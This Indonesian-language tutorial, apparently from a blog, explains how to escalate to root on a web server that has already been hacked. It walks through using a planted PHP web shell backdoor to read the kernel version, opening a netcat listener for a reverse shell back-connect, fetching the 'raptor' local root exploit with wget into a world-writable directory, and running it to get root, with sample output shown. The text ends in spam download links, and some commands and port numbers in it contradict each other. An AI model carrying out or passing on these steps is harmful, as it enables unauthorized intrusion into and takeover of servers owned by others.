Peralatan :
1. Situs Target yang sudah di inject “Shell backdoor” Download Backdoor
2. Localroot Exploit --> Silahkan cari disini
3. PC/Laptop
4. Netcat --> Untuk backconnect Download Netcat
Tutorial :
- Cari Informasi Detail Server TargetBuka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor “shell php”
Contoh: http://www.situstargetyangtelahdihack.com/path/dir/shell.php
Tampilannya akan seperti dibawah:
Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di “shell backdoor” seperti contoh di atas yaitu:
Linux 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
Atau anda juga bisa menggunakan dan menjalankan perintah: uname -a
Dari informasi diatas kita ketahui bahwa kernelnya adalah: 2.6.32
Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan “LocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini: 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
Kemudian kita car local rootnya disini - Back Connecting Dari Server Ke Komputer Attacker
Seperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah: Netcat Tools (Harus sudah terinstall di komputer)
Open port (Port-port yang secara otomatis terbuka)
Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalah 1234:
C:\WINDOWS\system32\cmd.exe -nc -n -l -v -p 1234
Kemudian tekan “Enter”
Nanti akan muncul pesan “Listening on [any] 443 …”
Setelah itu, kita kembali ke “shell backkdor” yang sudah kita tanamkan.
Cari fungsi “Back Connect“, kemudian isikan IP yang kita miliki & port.
Misal: IP Kita: 10.10.10.10 dan port: 443Kita jalankan perintah “Connect”
Klo berhasil akan muncul tulisan seperti ini :Listening on [any] 1234 …
Connect to [72.167.38.147] from localhost [127.0.0.1] 1234
Linux target.com 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
id : uid=511(listenr) gid=511(listenr) groups=511(listenr) context=system_u:system_r:initrc_t:s0 - Eksekusi Server
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server."
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.32, maka kita akan menggunakan 2.6.32
Informasi mengenai local exploit untuk masing” kernel bisa dicari google.
Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan perintahnya: ./raptor
w00t: uid=0(root) gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
Wow, selamat anda sudah mendapatkan root.
Rooting Server Backconnect >>>>> Download Now
BalasHapus>>>>> Download Full
Rooting Server Backconnect >>>>> Download LINK
>>>>> Download Now
Rooting Server Backconnect >>>>> Download Full
>>>>> Download LINK